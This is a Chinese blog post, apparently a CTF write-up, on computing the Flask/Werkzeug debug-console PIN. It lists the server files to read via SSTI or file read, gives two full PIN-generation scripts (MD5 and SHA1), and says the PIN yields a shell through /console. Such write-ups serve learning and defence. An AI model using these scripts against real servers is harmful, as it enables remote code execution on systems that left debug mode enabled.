小骆驼不加冰的世界


——鹏北海,凤朝阳,又携书剑路茫茫。明年此日青云归,再笑人间举子忙——

关于计算Python flask的debug模式的pin

2022年4月10日 1条评论 567次阅读 2人点赞 小骆驼不加冰

简单介绍一下flask的debug,在flask开启debug的情况下,只要得到pin码就能进行代码调试模式,简单理解为flask的debug就是个带密码的后门

进入代码调试模式

http://ip/console

我这里是ctfshow的一个靶机,只要获得了这个PIN值,我们就能直接调试python代码,通过os库进行命令执行。

接下来就讲一讲pin的生成要素(注意python3.8之后和以前的Pin生成算法有区别)

Pin生成要素

1.username代码中通过getpass.getuser()读取,文件中通过读取/etc/passwd来猜测

2.modname代码中通过getattr(mod,"__file__",none)读取,默认为flask.app

3.appname代码中通过getattr(app,"__name__",type(app).__name__)读取,默认为Flask

4.moddir代码中通过getattr(mod,"__file__",none)读取,实际上可以通过报错得到

5.uuidnode代码中通过uuid.getnode()读取,文件中通过读取/sys/class/net/eth0/address得到16进制结果,转为10进制参与计算

6.machine_id代码中通过合并3个文件的指定值确定,文件中读取 (/etc/machine-id /proc/sys/kernel/random/boot_id /proc/self/cgroup)

也就是说,除了2和3两个默认的值还需要使用ssti(模板注入)或者任意文件读取来获取1,4,5,6

因为这题是docker靶场,所以6中是/proc/sys/kernel/random/boot_id 和/proc/self/cgroup进行拼接

计算脚本:
因为3.8开始和之前的算法不同,这里贴两个脚本
3.7

import hashlib
from itertools import chain
probably_public_bits = [
    'root'# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.8/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
    '2485377611897',# str(uuid.getnode()),  /sys/class/net/ens33/address
    'd8903fc907209fcd05680275157daa7831583ab1089207a1c799d44d97ab5aa4'# get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

3.8

import hashlib
from itertools import chain
probably_public_bits = [
    'root'# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.8/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
    '2485377612198',# str(uuid.getnode()),  /sys/class/net/ens33/address
    '653dc458-4634-42b1-9a7a-b22a082e1fce04f3b6855075b3626a32e7981c0685e3224f8bcfd6c9f7fea546f326a286d3b6'# get_machine_id(), /proc/sys/kernel/random/boot_id /etc/machine-id /proc/self/cgroup
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

在获得了上述要素的值之后,填入脚本中相应的位置,即可计算出pin值,拿到shell了

既不回头,何必不忘

既已无缘,何须誓言

今日种种,似水无痕

明夕今夕,君已陌路

点赞
No Tag
最后编辑:2022年4月10日
  1. 朱哥的腿毛说道:
    2022年5月5日 下午2:10

    好厉害啊朱哥

    回复

发表回复

电子邮件地址不会被公开。必填项已用 * 标注